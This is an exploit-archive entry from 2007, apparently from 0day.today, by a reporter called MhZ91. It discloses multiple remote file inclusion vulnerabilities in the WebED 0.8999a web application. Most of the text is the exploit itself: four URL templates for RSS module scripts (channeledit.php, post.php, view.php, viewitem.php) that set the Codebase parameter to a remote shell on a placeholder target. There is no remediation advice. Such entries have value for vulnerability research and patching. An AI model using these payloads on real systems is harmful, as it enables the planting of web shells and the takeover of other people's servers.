WebED 0.8999a Multiple Remote File Inclusion Vulnerabilities

2007-09-08T00:00:00
ID 1337DAY-ID-2123
Type zdt
Reporter MhZ91
Modified 2007-09-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
WebED 0.8999a Multiple Remote File Inclusion Vulnerabilities
============================================================


---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          

---------------------------------------------------------------
 Multiple Remote File Inclusion Vulnerability
---------------------------------------------------------------
# Author: MhZ91 
# Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz
# Exploit:
# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]
---------------------------------------------------------------



#  0day.today [2018-01-05]  #